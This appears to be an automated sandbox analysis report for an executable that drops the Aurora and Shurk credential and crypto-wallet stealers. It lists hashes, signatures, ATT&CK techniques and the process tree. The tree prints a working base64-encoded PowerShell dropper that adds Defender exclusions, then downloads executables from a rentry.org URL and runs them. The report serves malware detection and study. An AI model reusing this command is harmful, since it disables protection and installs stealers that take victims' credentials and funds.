Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    04-03-2024 18:43

General

  • Target

    f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe

  • Size

    25.5MB

  • MD5

    ad9eddce12966e365ddb9b7fdae91340

  • SHA1

    7f7bc6ceb99c67e01423c6f171df03f92771224e

  • SHA256

    f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6

  • SHA512

    82932ed99e4a87730b3fda8d4bff0cae261dede6a36a25eae670b10f7d2b6903c2576b4cf8f9d263d9ec8ff22a05b967e039e0d299195bb6aad7f0445bdf2522

  • SSDEEP

    98304:blQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxW:xQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRD

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/sb54d2/raw

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Shurk

    Shurk is an infostealer, written in C++ which appeared in 2021.

  • Shurk Stealer payload 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
    "C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
      "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      PID:2392
    • C:\Users\Admin\AppData\Local\Temp\black.exe
      "C:\Users\Admin\AppData\Local\Temp\black.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2720

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
    Filesize

    4.6MB

    MD5

    9a64e0b9cdeffc26d637391f13058420

    SHA1

    8f811eb9c1e305540bf3060de9886d4be528455b

    SHA256

    8fd7dd0de2261f9615e0ced6e5b46018c64571f2104322ebd07cc88e3b4f7461

    SHA512

    816bd3627ab6580d7ba8ed4853a50fe0ce2dc85abad22a58031d2f63a582023ca51f320dbe8f6ea76d66e5601110ad7e141349312f21ed0e4a5375b187f2668c

  • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
    Filesize

    4.8MB

    MD5

    bb340b9b02f9433b8f697e6c95de72a3

    SHA1

    54fbb8106fff4def4c47fcefccb2834036f97cad

    SHA256

    eb7086927fa23ca70e779c103aae769bcc137b4642ae3d5696d042c54216b357

    SHA512

    333a556baa03469cd51b5562a41c3ec4a92d4b2ae690dcc66ae4e30e720817903c02d3a86b7e8f00631c64d1d2b26164e72eb048a9e9073975fc898942470769

  • C:\Users\Admin\AppData\Local\Temp\black.exe
    Filesize

    74KB

    MD5

    b755c4a6af6e4616b7174e9184d4bd01

    SHA1

    e856e899dcd618263c28ed7f635b2a95746564a2

    SHA256

    7bfc325de2e448380fe3ae921dddd5b4ab94432d60487d662d7b10ef2b248969

    SHA512

    def7a5405fda0692f8bf7dbc7cfb67e2e38c6a3391b52209cf73b43b2773216e7bc399e8449d752db6fa6910387f22d7a2cd2a543f30983d13603f75a52345f0

  • \Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
    Filesize

    4.9MB

    MD5

    4b0438cbadca1feb51df5ebfdcb7cfb9

    SHA1

    59c65b08e01f301aff5a32bf0b3241cd8b87ec35

    SHA256

    d0a29d755a32649ac5189d7228ea167f044eef9c2f69be01da0560255cfb29d4

    SHA512

    180698d4863d599cdf4e435e2f6f96c6fbbcdda1c8ebfcba22c8dff7cb03f2f02576048ed2e039e410c9a4c2476e4ad922055f9fa62a56d279a586e5cbbe83f5

  • \Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
    Filesize

    5.2MB

    MD5

    e81f39643bac69abe47e225738e755cb

    SHA1

    743bba9efa71671e0742601b04a4392d6d561cf2

    SHA256

    8a6c30ad2524fee73e67c524655d35be1a5e29a1959dca96b0109ad1adf20b23

    SHA512

    d59b6dc4b509e3a2048b7aaa8d54b48c8bab7b2c9a7b21ca30ea5d04e3b3cc07ceaae73ccd4a183ef5e66ac99f0b9e9c640f1f1ad353d7c1841ccbf11f875dd8

  • \Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
    Filesize

    4.5MB

    MD5

    6d63551a1a9a8703df89466edaabfbcf

    SHA1

    24a6a9f19a618f4c1152a27e2bd31de490ec0b07

    SHA256

    a7a25d18db5178e32c9068965c1331a9c61b418c4e99e979fc590ffa2fef6e12

    SHA512

    7b1670b4a1bc7655d9d4bf4afd36e9942b78013a023a30148c7ee932df6492eadda9138e875aa0c96e2322c3654a0267f50719fb3373045d1f548992341a4d4a

  • memory/2208-15-0x0000000000110000-0x0000000000128000-memory.dmp
    Filesize

    96KB

  • memory/2208-17-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp
    Filesize

    9.9MB

  • memory/2208-33-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp
    Filesize

    9.9MB

  • memory/2368-13-0x0000000000400000-0x0000000001D8A000-memory.dmp
    Filesize

    25.5MB

  • memory/2392-30-0x000000013F250000-0x0000000140B5B000-memory.dmp
    Filesize

    25.0MB

  • memory/2720-23-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize

    2.9MB

  • memory/2720-25-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2720-26-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2720-27-0x0000000002930000-0x00000000029B0000-memory.dmp
    Filesize

    512KB

  • memory/2720-29-0x0000000002930000-0x00000000029B0000-memory.dmp
    Filesize

    512KB

  • memory/2720-28-0x0000000002930000-0x00000000029B0000-memory.dmp
    Filesize

    512KB

  • memory/2720-24-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
    Filesize

    32KB

  • memory/2720-31-0x0000000002930000-0x00000000029B0000-memory.dmp
    Filesize

    512KB

  • memory/2720-32-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2720-22-0x0000000002930000-0x00000000029B0000-memory.dmp
    Filesize

    512KB